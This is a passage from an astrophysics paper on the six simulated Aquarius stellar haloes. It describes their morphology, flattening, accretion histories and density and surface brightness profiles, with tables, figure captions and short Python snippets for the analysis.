(Ibata {et~al.} 2005), which rotates rapidly, contains a young stellar
population and is aligned with the axes of the thin disc, but
extends to $\sim40\,\rm{kpc}$ and shows many irregular morphological
features suggestive of a violent origin.} In principle, our model
\newt{will follow the formation of} accreted
thick discs. However, \newt{the stars in our model only feel the
potential of the dark halo}; the presence of a
massive baryonic disc could significantly alter this potential in the
central region and \newt{influence} the formation of \newt{an} accreted thick
disc (e.g. Velazquez \& White 1999).
\newt{O}ur models \newt{include that part of the galactic bulge built
from accreted stars, but none of the many other possible processes
of bulge formation (starbursts, bars etc.)}. However, the
interpretation of this component, the signatures of an observational
counterpart and the extent to which our simulation accurately
represents its dynamics are all beyond the scope of this
paper. \newt{Instead}, we will consider stars within \rbulge{} of the
dark halo potential centre as `accreted bulge', and define those
between \rbulge{} and a maximum radius of 280~kpc as the `stellar
halo' on which we will focus our analysis. This arbitrary radial cut
is chosen to exclude the region in which the observational separation
of `bulge' and `halo' stars is not straightforward, and which is
implicitly excluded from conventional observational definitions of
the halo. It is \textit{not} intended to reflect a physical
scale-length or dichotomy in our stellar haloes, analogous to that
claimed for the Milky Way
(e.g. Carollo {et~al.} 2007, 2009). Beyond \rbulge{} we
believe that the ambiguities discussed above and the `incompleteness'
of our models with regard to stars formed {\em in situ} should not
substantially affect the comparison of our \textit{accreted} stars
with observational data.
\section{Results: The Aquarius Stellar Haloes}
\label{sec:results}
\begin{figure*}
\centering \includegraphics[width=160mm]{fig6.eps}
\caption{\textit{V}-band surface
brightness of our model haloes (and surviving satellites), to a
limiting depth of $35\,\rm{mag/arcsec^{2}}$. The axis scales are in
kiloparsecs. Only stars formed in satellites are present in our
particle model; there is no contribution to these maps from a
central galactic disc or bulge formed in situ (see
\mnsec{sec:defining_haloes}).}
\label{fig:surfacebrightness}
\end{figure*}
\begin{figure*}
\centering \includegraphics[width=160mm]{fig7.eps}
\caption{As \fig{fig:surfacebrightness}, but here showing only those
stars stripped from satellites that survive at $z=0$.}
\label{fig:sbsurvivors}
\end{figure*}
\begin{table*}
\begin{minipage}{160mm} \caption{For each of our simulated haloes
we tabulate: the luminosity and mass of halo stars (in the range
$3<r<280$~kpc); the mass of accreted bulge stars ($r<3$~kpc); the
total stellar mass and \textit{V}-band magnitude of the central galaxy in
\galform{}; the number of surviving satellites (brighter than
$M_{\rm{V}}=0$); the fraction of the total stellar mass within
280~kpc bound in surviving satellites at $z=0$, $f_{\rm{sat}}$;
the fraction of \textit{halo} stellar mass ($r<280$~kpc)
contributed by these surviving satellites, $f_{\rm{surv}}$; the
number of halo progenitors, $N_{\rm{prog}}$ (see text); the
half-light radius of the stellar halo ($r<280$~kpc); the inner and
outer slope and break radius of a broken power-law fit to the
three-dimensional density profile of halo stars ($3<r<280$~kpc).}
\begin{tabular}{@{}lccccccccccccc}
\hline
Halo &
$L_{V,\rm{halo}}$&
$M_{\star,\rm{halo}}$&
$M_{\star,\rm{bulge}}$&
$M_{\rm{gal}}$&
$M_{V}$&
$N_{\rm{sat}}$&
$f_{\rm{sat}}$&
$f_{\rm{surv}}$&
$N_{\rm{prog}}$&
$r_{1/2}$&
$n_{\rm{in}}$&
$n_{\rm{out}}$&
$r_{\rm{brk}}$ \\
&
$[10^{8} \rm{L_{\sun}}]$ &
$[10^{8} \rm{M_{\sun}}]$ &
$[10^{8} \rm{M_{\sun}}]$ &
$[10^{10} \rm{M_{\sun}}]$ &
&
&
&
&
&
$\rm{[kpc]}$ & & & $\rm{[kpc]}$ \\
\hline
A & 1.51 & 2.80 & 1.00 & 1.88 & -20.3 & 161 & 0.61 & 0.065 & 3.8 & 20 & -2.7 & -8.2 & 80.4\\
B & 1.27 & 2.27 & 3.33 & 1.49 & -20.1 & 91 & 0.07 & 0.036 & 2.4 & 2.3 & -4.2 & -5.8 & 34.6\\
C & 1.95 & 3.58 & 0.34 & 7.84 & -21.3 & 150 & 0.28 & 0.667 & 2.8 & 53 & -2.0 & -9.4 & 90.8\\
D & 5.55 & 9.81 & 1.32 & 0.72 & -19.1 & 178 & 0.35 & 0.620 & 4.3 & 26 & -2.0 & -5.9 & 37.7\\
E & 0.90 & 1.76 & 16.80 & 0.45 & -18.6 & 135 & 0.11 & 0.003 & 1.2 & 1.0 & -4.7 & -4.4 & 15.2\\
F & 17.34 & 24.90 & 6.42 & 1.36 & -20.1 & 134 & 0.28 & 0.002 & 1.1 & 6.3 & -2.9 & -5.9 & 14.0\\
\hline
\end{tabular}
\label{tbl:summary}
\end{minipage}
\end{table*}
In this section, we present the six stellar haloes resulting from the
application of the method described above to the Aquarius
simulations. Here our aim is to characterise the assembly history of
the six haloes and their global properties. Quantities measured for
each halo are collected in \mntab{tbl:summary}. These include a measure of the number of progenitor galaxies
contributing to the stellar halo, $N_{\rm{prog}}$. This last quantity
is not the total number of accreted satellites, but instead is defined
as $N_{\rm{prog}}=M_{\rm{halo}}^{2}/\sum_{i}{m_{\rm{{prog,i}}}^{2}}$
where $m_{\rm{{prog,i}}}$ is the stellar mass contributed by the $i$th
progenitor. $N_{\rm{prog}}$ is equal to the total number of
progenitors in the case where each contributes equal mass, or to the
number of significant progenitors in the case where the remainder
provide a negligible contribution.
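This estimator is an inverse participation ratio; a short Python sketch (taking, as the definition implies, $M_{\rm{halo}}$ equal to the summed contributions) makes its limiting behaviour explicit. The function name and toy values are hypothetical.

```python
import numpy as np

def n_prog(progenitor_masses):
    """Effective number of stellar halo progenitors,
    N_prog = M_halo^2 / sum_i m_i^2, taking M_halo = sum_i m_i."""
    m = np.asarray(progenitor_masses, dtype=float)
    return m.sum() ** 2 / np.sum(m ** 2)

# Equal contributions: N_prog equals the actual number of progenitors.
print(n_prog([1.0, 1.0, 1.0, 1.0]))   # 4.0
# One dominant progenitor: N_prog approaches 1.
print(n_prog([100.0, 0.1, 0.1, 0.1]))
```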
\subsection{Visualisation in projection}
\label{sec:projections}
A $300\times300\:\rm{kpc}$ projected surface brightness map of each
stellar halo at $z=0$ is shown in
\fig{fig:surfacebrightness}. Substantial diversity among the six
haloes is apparent. Haloes Aq-B and Aq-E are distinguished by
their strong central concentration, with few features of detectable
surface brightness beyond $\sim 20\,\rm{kpc}$. Haloes Aq-A, Aq-C,
Aq-D and Aq-F all show more extended envelopes to 75-100 kpc; each
envelope is a superposition of streams and shells that have been
phase-mixed to varying degrees.
Analogues of many morphological features observed in the halo of M31
(Ibata {et~al.} 2007; Tanaka {et~al.} 2009; McConnachie {et~al.} 2009) and other galaxies
(e.g. Mart{\'{i}}nez-Delgado {et~al.} 2008) can be found in our simulations. For
example, the lower left quadrant of Aq-A
shows arc-like features reminiscent of a complex of `parallel' streams
in the M31 halo labelled A, B, C and D by Ibata {et~al.} (2007) and
Chapman {et~al.} (2008), which have surface brightnesses of
$30-33\,\rm{mag\,arcsec^{{-}2}}$ and a range of metallicities
(Tanaka {et~al.} 2009). These streams in Aq-A can also be traced faintly in
the upper right quadrant of the image and
superficially resemble the edges of `shells'. In fact, they result
from two separate progenitor streams, each tracing multiple wraps of
decaying orbits (and hence contributing more than one `arc'
each). Seen in three dimensions, these two debris complexes (which are
among the most significant contributors to the Aq-A halo) are
elaborate and irregular structures, the true nature of which is not
readily apparent in any given projection\footnote{Three orthogonal
projections for each halo can be found at
\url{http://www.virgo.dur.ac.uk/aquarius}}.
The brightest and most coherent structures visible in
\fig{fig:surfacebrightness} are attributable to the most recent
accretion events. To illustrate the contribution of
recently-infalling objects (quantified in
\mnsec{sec:assembly}), we show the same projections of the haloes in
\fig{fig:sbsurvivors}, but include only those stars whose parent
satellite survives at $z=0$. In haloes Aq-C and Aq-D, stars stripped
from surviving satellites constitute $\sim60-70\%$ of the halo, while in
the other haloes their contribution is $\lesssim10\%$. Not all
the recently-infalling satellites responsible for bright halo features
survive: one example is the massive satellite that merges at $z\sim0.3$
and produces the prominent set of `shells' in Aq-F.
\begin{table}
\caption{Axial ratios $q=c/a$ and $s=b/a$ of stellar-mass-weighted
three-dimensional ellipsoidal fits to halo stars within a
galactocentric radius of 10 kpc. These were determined using the
iterative procedure described by Allgood {et~al.} (2006), which
attempts to fit the shapes of self-consistent `isodensity'
contours. A spherical contour of $r=10$~kpc is assumed
initially; the shape and orientation of this contour are then
updated on each iteration to those obtained by diagonalising the
inertia tensor of the mass enclosed (maintaining the length of
the longest axis). The values thus obtained are slightly more
prolate than those obtained from a single diagonalisation using
all mass with a spherical contour (i.e. the first iteration of
our approach), reflecting the extremely flattened shapes of our
haloes at this radius. The oblate shape of Aq-E is not sensitive
to this choice of method.}
\begin{tabular}{@{}lcccccc}
\hline
Halo & A & B & C & D & E & F\\
\hline
$q_{10}$ & 0.27 & 0.28 & 0.29 & 0.33 & 0.36 & 0.21\\
$s_{10}$ & 0.30 & 0.32 & 0.32 & 0.42 & 0.96 & 0.25\\
\hline
\end{tabular}
\label{tbl:shapes}
\end{table}
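The iterative shape fit described in the table caption can be sketched as follows. This is an illustrative reimplementation of an Allgood {et~al.} (2006)-style procedure, not the code used for the paper; the convergence criterion (a fixed iteration count) is a simplification.

```python
import numpy as np

def iterative_axis_ratios(pos, mass, r, n_iter=20):
    """Iteratively fit ellipsoidal 'isodensity' contours: diagonalise
    the inertia tensor of the mass inside the current selection
    ellipsoid, update its orientation and axis ratios, and keep the
    longest axis fixed at r. Returns (s, q) = (b/a, c/a)."""
    axes = np.eye(3)   # rows: current principal directions
    s = q = 1.0        # b/a and c/a of the selection ellipsoid
    for _ in range(n_iter):
        x = pos @ axes.T   # coordinates in the current principal frame
        ell2 = (x[:, 0] / r) ** 2 + (x[:, 1] / (s * r)) ** 2 \
             + (x[:, 2] / (q * r)) ** 2
        sel = ell2 <= 1.0
        m = mass[sel][:, None, None]
        inertia = (m * x[sel][:, :, None] * x[sel][:, None, :]).sum(axis=0)
        evals, evecs = np.linalg.eigh(inertia)
        order = np.argsort(evals)[::-1]          # a >= b >= c
        evals, evecs = evals[order], evecs[:, order]
        axes = evecs.T @ axes                    # rotate into new frame
        s, q = np.sqrt(evals[1] / evals[0]), np.sqrt(evals[2] / evals[0])
    return s, q
```

The first iteration uses a spherical contour, so returning after one pass would reproduce the single-diagonalisation values that the caption notes are slightly less prolate.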
\fig{fig:surfacebrightness} shows that all our haloes are notably
flattened, particularly in the central regions where \newt{most} of
their light is concentrated. Axial ratios $q=c/a$ and $s=b/a$ of
three-dimensional ellipsoidal fits to halo stars within 10 kpc of the
halo centre are given in \mntab{tbl:shapes} (these fits include stars
within the accreted bulge region defined above). \movt{Most of
our haloes are strongly prolate within 10~kpc. Halo Aq-E is very
different, having a highly oblate (i.e. disc-like) shape in this
region -- this structure of $\sim20$~kpc extent can be seen `edge
on' in \fig{fig:surfacebrightness} \newt{and can be described as} an `accreted thick disc'
\newt{(e.g. Abadi {et~al.} 2003; Pe{\~{n}}arrubia, McConnachie \& Babul 2006; Read {et~al.} 2008)}. We defer
further analysis of this interesting object to a subsequent
paper.} Beyond 10--30~kpc, the stellar mass in our haloes is not
\newt{smoothly }distributed but \movt{instead} consists of a number of discrete
streams, plumes and other irregular structures. Fits to all halo stars
assuming a smoothly varying ellipsoidal distribution of mass interior
to a given radius do not accurately describe these sparse outer
regions.
Few observations of stellar halo shapes are available for comparison
with our models. M31 is the only galaxy in which a projected stellar
halo has been imaged to a depth sufficient to account for a
significant fraction of halo stars. Pritchet \& van~den Bergh (1994) measured a
projected axial ratio for the M31 halo at $\sim10$~kpc of
$\sim0.5$. Ibata {et~al.} (2005) describe a highly irregular and rotating
inner halo component or `extended disc' (to $\sim40\,\rm{kpc}$) of
$27-31\,\rm{mag/arcsec^{2}}$, aligned with the thin disc and having an
axial ratio $\sim0.6$ in projection. Zibetti \& Ferguson (2004) find a
similar axial ratio for the halo of a galaxy at $z=0.32$ observed in
the Hubble ultra-deep field. Evidence for the universality of
flattened stellar haloes is given by Zibetti, White \& Brinkmann (2004), who find a
best-fitting projected axial ratio of $\sim0.5-0.7$ for the low
surface brightness envelope of $\sim1000$ stacked edge-on late-type
galaxies in SDSS. A mildly \textit{oblate} halo with $c/a\sim0.6$ is
reported for the Milky Way, with an increase in flattening at smaller
radii ($<20$~kpc;
e.g. Chiba \& Beers 2000; Bell {et~al.} 2008; Carollo {et~al.} 2007). Interestingly,
Morrison {et~al.} (2009) present evidence for a highly flattened halo
($c/a\sim0.2$) component in the Solar neighbourhood, which appears to
be dispersion-supported (i.e. kinematically \textit{distinct} from a
rotationally supported thick disc).
The shapes of components in our haloes selected by their kinematics,
chemistry or photometry may be very different to those obtained from
the aggregated stellar mass. A full comparison, accounting for the
variety of observational selections, projection effects and
definitions of `shape' used in the measurements cited above, is beyond
the scope of this paper. We emphasize, however, that the flattening in
our stellar haloes cannot be attributed to any `baryonic' effects such
as a thin disc potential (e.g. Chiba \& Beers 2001) or star formation in
dissipative mergers and bulk gas flows
(e.g. Bekki \& Chiba 2001). Furthermore, it is unlikely to be the result
of a (lesser) degree of flattening in the dark halo. Instead the
structure of these components is most likely to reflect the
intrinsically anisotropic distribution of satellite orbits. In certain
cases (for example, Aq-D and Aq-A), it is clear that several
contributing satellites with correlated trajectories are responsible
for reinforcing the flattening of the inner halo.
\subsection{Assembly history of the stellar halo}
\label{sec:assembly}
We now examine when and how our stellar haloes were
assembled. \fig{fig:halogrowth} shows the mass fraction of each
stellar halo (here \textit{including} the accreted bulge component
defined in \mnsec{sec:defining_haloes}) in place (i.e. unbound from
its parent galaxy) at a given redshift. We count \newt{as belonging to the stellar halo} all `star particles'
bound to the main dark halo and within 280 kpc of \newt{its} centre at $z=0$. This is compared with the growth of
the corresponding host dark haloes. \newt{O}ur sample spans a range of
assembly histories, even though the haloes have very similar final masses.
\begin{figure}
\includegraphics[width=84mm,clip=True, trim=0mm 0cm 0cm
0cm]{fig8.eps}
\caption{The growth of the stellar halo (\textit{upper panel}) and the
dark matter halo (the principal branch; \textit{lower panel}) as a
function of expansion factor (\textit{bottom axis}) or redshift
(\textit{top axis}). Lines show the mass fraction of each halo in
place at a given time. Stars are counted as belonging to the stellar
halo when the DM particle that they tag is assigned to the principal
halo, or is not bound to any \subfind{} group.}
\label{fig:halogrowth}
\end{figure}
Not surprisingly, the growth of the dark halo is considerably
\newt{smoother} than that of the stellar halo. The
`luminous' satellite accretion events contributing stars
\newt{are} a small subset of those that contribute to
the dark halo, which additionally accrete\newt{s} a
substantial fraction of its mass in the form of `diffuse' dark matter
\newt{(Wang et
al. in prep.)}. As described in detail by
Pe{\~{n}}arrubia {et~al.} (2008a,b), the dark haloes of infalling
satellites must be heavily stripped before the deeply embedded stars
are removed. This gives rise to time-lags seen in \fig{fig:halogrowth}
between the major events building dark and stellar haloes.
To characterise the similarities and differences between their
histories, we subdivide our sample of six stellar haloes into two
broad categories: those that grow through the gradual accretion of
many progenitors (Aq-A, Aq-C and Aq-D) and those for which the
majority of stellar mass is contributed by only one or two major
events (Aq-B, Aq-E and Aq-F). We refer to this latter case as
`few-progenitor' growth. The measure of the number of
`most-significant' progenitors given in \mntab{tbl:summary},
$N_{\rm{prog}}$, also ranks the haloes by the `smoothness' of their
accretion history, reflecting the intrinsically stochastic nature of
their assembly.
\fig{fig:victim_vs_survivor_lf} compares the luminosity
functions (LFs) of surviving satellites with \newt{those of the satellites} totally disrupted \newt{to form the
stellar halo}, measuring luminosity at the time of infall in
both cases. In general, there are fewer disrupted satellites than
survivors over almost all luminosities, although the numbers and
luminosities of the very brightest contributors and survivors are
comparable in each halo. The deficit in the number of disrupted
satellites relative to survivors is most pronounced in the
few-progenitor haloes Aq-B and Aq-F.
\begin{figure}
\includegraphics[width=84mm,clip=True, trim=0cm 0cm 0cm 0cm]{fig9.eps}
\caption{Luminosity functions of surviving satellites (solid) in each
of our six haloes, compared with those of totally disrupted halo
progenitors (dashed). These are constructed using only stars formed
in each satellite before the time of infall (the halo-subhalo
transition). The luminosity of each population is that after
evolution to $z=0$.}
\label{fig:victim_vs_survivor_lf}
\end{figure}
\fig{fig:contributions} summarises \movt{the
individual accretion events that contribute to the assembly of the
stellar halo}, plotting the stellar mass of the most significant
progenitor satellites against their redshift of infall (the
time at which their host halo first \newt{becomes} a
subhalo of the main FOF group). Here we class as significant those
satellites which together contribute 95\% of the total halo stellar
mass (this total is shown as a vertical line for each halo) when
accumulated in rank order of their contribution. By this measure there
are (5,6,8,6,6,1) significant progenitors for haloes (A,B,C,D,E,F). We
also compare the masses of the brightest Milky Way satellites to the
significant contributors in our stellar haloes. Typically the most
significant contributors have masses comparable to the most massive
surviving dwarf spheroidals, Fornax and Sagittarius.
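Counting significant progenitors by this criterion is a cumulative sum in rank order. A minimal sketch (the function name is hypothetical):

```python
import numpy as np

def n_significant(contributions, threshold=0.95):
    """Number of progenitors that, accumulated in rank order of their
    contributed stellar mass, together supply `threshold` of the total."""
    m = np.sort(np.asarray(contributions, dtype=float))[::-1]
    cum = np.cumsum(m) / m.sum()
    return int(np.searchsorted(cum, threshold) + 1)

# Toy example: the four largest contributors supply 95% of the mass.
print(n_significant([50.0, 30.0, 10.0, 5.0, 3.0, 2.0]))  # 4
```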
\begin{figure}
\includegraphics[width=84mm,clip=True,trim=0 0 0 0]{fig10.eps}
\caption{\textit{Main panel}: for satellites that have been stripped
to form the stellar haloes, symbols show the redshift of infall and
total mass contributed to the stellar halo at $z=0$ (in the range $3
< r < 280\,\rm{kpc}$). Vertical lines indicate the total mass of
each stellar halo in this radial range. The right-hand $y$-axis is
labelled by lookback time in gigayears. We plot only those
satellites whose individual contributions, accumulated in rank order
from the most significant contributor, account for 95\% of the total
stellar halo mass. Satellites totally disrupted by $z=0$ are plotted
as open circles, surviving satellites as filled squares (in almost
all cases the contributions of these survivors are close to their
total stellar masses; see text). \textit{ Lower panel:} symbols
indicate the approximate masses of bright MW satellites, assuming a
stellar mass-to-light ratio of 2; the Sgr present-day mass estimate
is that given by Law, Johnston \& Majewski (2005). The shaded region indicates an
approximate range for the MW halo mass in our halo regime (see
e.g. Bell {et~al.} 2008).}
\label{fig:contributions}
\end{figure}
\begin{figure}
\includegraphics[width=84mm]{fig11.eps}
\caption{Cumulative mass fraction of each stellar halo originating in
satellites of stellar mass less than $M_{\rm{sat}}$. Satellite
masses are normalised to the total stellar halo mass
$M_{\rm{halo}}$ in each case, as defined in
\mnsec{sec:defining_haloes}.}
\label{fig:carlos_contribs}
\end{figure}
\begin{figure}
\includegraphics[width=84mm]{fig12.eps}
\caption{Number of surviving satellites (aggregated over all six
haloes) which have lost a fraction, $f_{\rm{stripped}}$, of the
stellar mass through tidal stripping. Satellites are divided into
three mass bins: massive (purple), intermediate (dashed orange)
and low-mass (dotted black) as quantified in the legend. The
leftmost bin (demarcated by a vertical line) shows the number of
satellites that have not suffered any stellar mass loss.}
\label{fig:stripping}
\end{figure}
With the exception of Aq-F, all the most significant contributors to
our stellar haloes were accreted more than 8 Gyr ago. We highlight (as
filled squares) those contributors whose cores survive as self-bound
objects at $z=0$. We find that surviving satellites accreted before
$z=1$ are the dominant contributors to the many-progenitor haloes Aq-C
and Aq-D. The extreme case of Aq-F is atypical: more than 95\% of the
halo was contributed by the late merger of an object of stellar mass
greater than the SMC infalling at $z\sim0.7$, which does not
survive. By contrast, the two least massive haloes Aq-B and Aq-E are
built by many less massive accretions at higher redshift, with
surviving satellites making only a minor contribution ($<10\%$). Halo
Aq-A represents an intermediate case, in which stars stripped from a
relatively late-infalling survivor add significantly ($\sim10\%$) to the mass of
a halo predominantly assembled at high redshift. The relative
contributions to the halo of all accretion events are illustrated in
\fig{fig:carlos_contribs}. Each line in this figure indicates the
fraction of the total halo stellar mass that was contributed by
satellites donating less than a given fraction of this total
\textit{individually}. An interesting feature illustrated by this
figure concerns Aq-B, one of our few-progenitor haloes (shown as light
blue in all figures). Although \fig{fig:halogrowth} shows that the
assembly of this halo proceeds over time by a series of concentrated
`jumps' in mass, its final composition is even less biased to the most
significant progenitor than any of the many-progenitor haloes.
In general, surviving contributors to the halo retain less than 5\% of
the total stellar mass that formed in them. A small number of surviving contributors
retain a significant fraction of their mass; for example, the
surviving contributor to Aq-A retains 25\%. In
\fig{fig:stripping}, we show histograms of the number of all surviving
satellites (combining all six haloes) that have been stripped of a
given fraction of their mass. Most satellites are either largely
unaffected or almost totally stripped, indicating that the time spent
in an intermediate disrupting state is relatively short.
In \mntab{tbl:summary}, we give the fraction of mass in the stellar
halo that has been stripped from surviving satellites,
$f_{\rm{surv}}$. As previously stated, this contribution is dominant
in haloes Aq-C (67\%) and Aq-D (62\%), significant in Aq-A (7\%) and
Aq-B (4\%) and negligible in Aq-E and Aq-F. Sales {et~al.} (2007b)
find that only $\sim6\%$ of stars in the eight haloes formed in the
SPH simulations of
Abadi {et~al.} (2006) are associated with a surviving satellite. The lack of
surviving satellites may be attributable to the limited resolution of
those simulations; clearly, the number of `survivors' is sensitive to
the lowest mass at which remnant cores can be resolved. However,
Bullock \& Johnston (2005), and the companion study of Font {et~al.} (2006), also
conclude that the contribution of surviving satellites is small
($<10\%$ in all of their 11 haloes and typically $<1\%$). As the
resolution of their simulations is comparable to ours, the
predominance of surviving contributors in two of our haloes is
significant.
Bullock \& Johnston find that their haloes, like ours, are built from a
small number of massive objects (e.g. figure 10
of Bullock \& Johnston 2005) with comparable accretion times ($>8$ Gyr), suggesting
that there are no fundamental differences in the infall times and masses
of accreted satellites. Notably, Font {et~al.} (2006) observe that no
satellites accreted $>9$~Gyr ago survive in their subsample of four of
the Bullock \& Johnston haloes, whereas we find that some satellites
infalling even at redshifts $z>2$ may survive (see also
\fig{fig:zinfall_gradient} below). The discrepancy appears to stem from
the greater resilience of satellites accreted at $z>1$ in our models,
including some which contribute significantly to the stellar haloes. In
other words, our model does not predict any \newt{more} late-infalling
contributors \newt{than the models of Bullock \& Johnston}. The more
rapid disruption of massive subhaloes in the Bullock \& Johnston
models may be attributable to one or both of the analytic prescriptions
employed by those authors to model the growth of the dark matter halo
and dynamical friction in the absence of a live halo. It is also
possible that the relation between halo mass and concentration assumed
in the Bullock \& Johnston model results in satellites that are less
concentrated than subhaloes in the Aquarius simulations.
Current observational estimates (e.g. Bell {et~al.} 2008) imply that the
stellar halo of the Milky Way is intermediate in mass between our
haloes Aq-C and Aq-D; if its accretion history is, in fact,
qualitatively similar to these many-progenitor haloes,
\fig{fig:contributions} implies that it is likely to have accreted its
four or five most significant contributors around $z\sim1-3$ in the
form of objects with masses similar to the Fornax or Leo I dwarf
spheroidals. Between one and three of the most recently accreted, and
hence most massive contributors, are expected to retain a surviving
core, and to have a stellar mass comparable to Sagittarius
($M_{\rm{sgr}} \sim 5 \times 10^{8}\,\rm{M_{\sun}}$ or $\sim 50\%$ of
the total\footnote{Both the Sagittarius and Milky Way halo stellar
mass estimates are highly uncertain; it is unclear what contribution
is made by the Sgr debris to estimates of the halo mass, although
both the stream and the Virgo overdensity were masked out in the
analysis of Bell {et~al.} (2008) for which a value of $\sim3\times
10^{8}\,\rm{M_{\sun}}$ in the range $3<r<40\,\rm{kpc}$ was obtained from a
broken power-law fit to the remaining `smooth' halo.} halo mass,
infalling at a lookback time of $\sim5\,\rm{Gyr}$;
Law {et~al.} 2005). It is also possible that the Canis Major
overdensity (with a core luminosity comparable to that of
Sagittarius; Martin {et~al.} 2004) associated with the low-latitude Monoceros
stream (Newberg {et~al.} 2002; Yanny {et~al.} 2003; Ibata {et~al.} 2003) should be
included in the census of `surviving contributors' (although
this association is by no means certain;
e.g. Mateu {et~al.} 2009). Therefore, the picture so far established for the
Milky Way appears to be in qualitative agreement with the presence
of surviving cores from massive stellar halo contributors in our
simulations.
\subsection{Bulk halo properties and observables}
\label{sec:global_haloes}
\subsubsection{Distribution of mass}
\label{sec:distribution}
In \fig{fig:densityprofiles} we show the spherically averaged
density profiles of halo stars (excluding material bound in
surviving satellites, but making no distinction between streams,
tidal tails or other overdensities, and a `smooth' component). The
notable degree of substructure in these profiles contrasts with the
smooth dark matter haloes, which are well-fit by the Einasto
profiles shown in
\fig{fig:densityprofiles}. As discussed further below, this stellar
substructure is due to the contribution of localised, spatially
coherent subcomponents within the haloes, which are well resolved in
our particle representation.
\begin{figure}
\includegraphics[width=84mm,clip=True, trim=0mm 0cm 0cm 0cm]{fig13.eps}
\caption{Spherically averaged density profiles for our six stellar
haloes (shown as thin lines below the $\kappa=7$ radius of
Navarro {et~al.} 2008, at which the circular velocity
of the dark matter halo has converged to an accuracy of 1\%). Arrows
mark the break radii of broken power-law fits to each
profile. Dashed lines show Einasto profile fits to the corresponding
dark matter haloes (Navarro {et~al.} 2008). Grey vertical
lines demarcate our outer halo region (dotted) and the Solar
neighbourhood (solid); coloured vertical bars indicate $r_{200}$ for
the dark haloes. For reference we overplot representative data for
the Milky Way (orange): estimates of the halo density in the Solar
neighbourhood (symbols) from Gould, Flynn \& Bahcall (1998, square) and
Fuchs \& Jahrei{\ss{}} (1998, circle), and the best-fitting broken
power-law of Bell et al. (excluding the Sagittarius stream and Virgo
overdensity).}
\label{fig:densityprofiles}
\end{figure}
The shapes of the density profiles are broadly similar, showing a
strong central concentration and an outer decline considerably steeper
than that of the dark matter. We overplot in \fig{fig:densityprofiles}
an approximation of the Milky Way halo profile (Bell {et~al.} 2008) and
normalization (Fuchs \& Jahrei{\ss{}} 1998; Gould {et~al.} 1998). The gross structure of
our three many-progenitor haloes Aq-A, Aq-C and Aq-D can be fit with
broken power-law profiles having indices similar to the Milky Way
($n\sim-3$) interior to the break. Bell {et~al.} (2008) note that their
best-fitting observational profiles do not fully represent the complex
structure of the halo, even though they mask out known overdensities
(our fits include all halo substructure). Our fits decline somewhat
more steeply than the Bell {et~al.} data beyond their break
radii. We suggest that the Milky Way fit may represent variation at
the level of the fluctuations seen in our profiles, and that an even
steeper decline may be observed with a representative and well-sampled
tracer population to $>100$ kpc (for example, Ivezi{\'c} {et~al.} 2000 find a sharp
decline in counts of RR Lyrae stars beyond $\sim60$~kpc). In
contrast with the many-progenitor haloes, two of our few-progenitor
haloes (Aq-B and Aq-E) have consistently steeper profiles and show no
obvious break. Their densities in the Solar shell are \newt{none the
less} comparable to the many-progenitor haloes. Aq-F is dominated by
a single progenitor, the debris of which retains a high degree of
unmixed structure at $z=0$ (see also \fig{fig:deposition_profile}).
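For readers wishing to reproduce fits of this kind, a broken power-law (inner and outer slopes joined at a break radius) is conveniently fitted in log space with standard tools. The sketch below uses synthetic data with illustrative parameter values, not values taken from the simulations.

```python
import numpy as np
from scipy.optimize import curve_fit

def broken_power_law(logr, lognorm, logr_b, n_in, n_out):
    """log10 of a broken power-law density: slope n_in inside the
    break radius r_b and slope n_out outside it."""
    slope = np.where(logr < logr_b, n_in, n_out)
    return lognorm + slope * (logr - logr_b)

# Illustrative synthetic profile: n_in = -3, n_out = -5, break at 80 kpc.
rng = np.random.default_rng(0)
logr = np.linspace(np.log10(10.0), np.log10(300.0), 40)
logrho = broken_power_law(logr, 2.0, np.log10(80.0), -3.0, -5.0)
logrho += rng.normal(scale=0.05, size=logr.size)  # scatter in the log

popt, _ = curve_fit(broken_power_law, logr, logrho,
                    p0=(2.0, 2.0, -2.5, -4.5))
print(popt)  # recovered (lognorm, log r_b, n_in, n_out)
```

Fitting in the log prevents the dense inner bins from dominating the fit.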
We show projected surface brightness profiles in
\fig{fig:radialprofiles}. As with their three-dimensional
counterparts, two characteristic shapes distinguish the many- and
few-progenitor haloes. The few-progenitor haloes are centrally
concentrated and well fit in their innermost $\sim10\,\rm{kpc}$ by
Sersic profiles with $1.5<n<2.2$. Beyond $10\,\rm{kpc}$, extended
profiles with a more gradual rollover (described by Sersic profiles
with $n\sim1$ and $25<r_{\rm{eff}}<35$ kpc) are a better fit to the
many-progenitor haloes. In their centres, however, the many-progenitor
haloes display a steep central inflection in surface brightness. As a
consequence of these complex profiles, Sersic fits over the entire
halo region (which we defined to begin at 3~kpc) are not fully
representative in either case. To illustrate this broad dichotomy in
\fig{fig:radialprofiles}, Sersic fits to a smoothly growing halo
(Aq-C) \textit{beyond} 10~kpc and a few-progenitor halo (Aq-E)
\textit{interior to} 10~kpc are shown. Abadi {et~al.} (2006) found the
average of their simulated stellar haloes to be well-fit by a Sersic
profile ($n=6.3$, $r_{\rm{eff}}=7.7$~kpc) in the radial range
$30<r<130$~kpc, \newt{which we} show as an orange dashed line
in \fig{fig:radialprofiles}. This profile is close to the `mean'
profile of our haloes A, C and D interior to $30$~kpc (neglecting the
significant fluctuations and inflections within each individual halo
in \fig{fig:radialprofiles}), but does not capture the sharp decline
of our haloes at radii beyond 150~kpc. \fig{fig:radialprofiles} also
shows (as dashed grey lines) the fits of Ibata {et~al.} (2007) to the haloes
of M31 (comprising an $r^{1/4}$ spheroid and shallow powerlaw tail at
large radii) and M33 (powerlaw tail only).
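For reference, the Sersic profiles used in these fits have the standard form $\mu(r) = \mu_{\rm eff} + (2.5\,b_n/\ln 10)\,[(r/r_{\rm eff})^{1/n} - 1]$. A minimal evaluation, using the common asymptotic approximation for $b_n$ (Ciotti \& Bertin 1999) and illustrative parameter values, is:

```python
import numpy as np

def b_n(n):
    """Asymptotic approximation to the Sersic constant b_n (Ciotti &
    Bertin 1999), chosen so that r_eff encloses half the projected light."""
    return 2.0 * n - 1.0 / 3.0 + 4.0 / (405.0 * n) + 46.0 / (25515.0 * n**2)

def sersic_mu(r, mu_eff, r_eff, n):
    """Surface brightness [mag/arcsec^2] at radius r for a Sersic profile."""
    return mu_eff + 2.5 * b_n(n) / np.log(10.0) * ((r / r_eff) ** (1.0 / n) - 1.0)

# Illustrative n = 1 profile with r_eff = 30 kpc (cf. the many-progenitor fits).
r = np.array([3.0, 30.0, 100.0, 150.0])
print(sersic_mu(r, mu_eff=30.0, r_eff=30.0, n=1.0))
```

By construction $\mu(r_{\rm eff}) = \mu_{\rm eff}$, so the fitted scale radii can be read off directly from such profiles.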
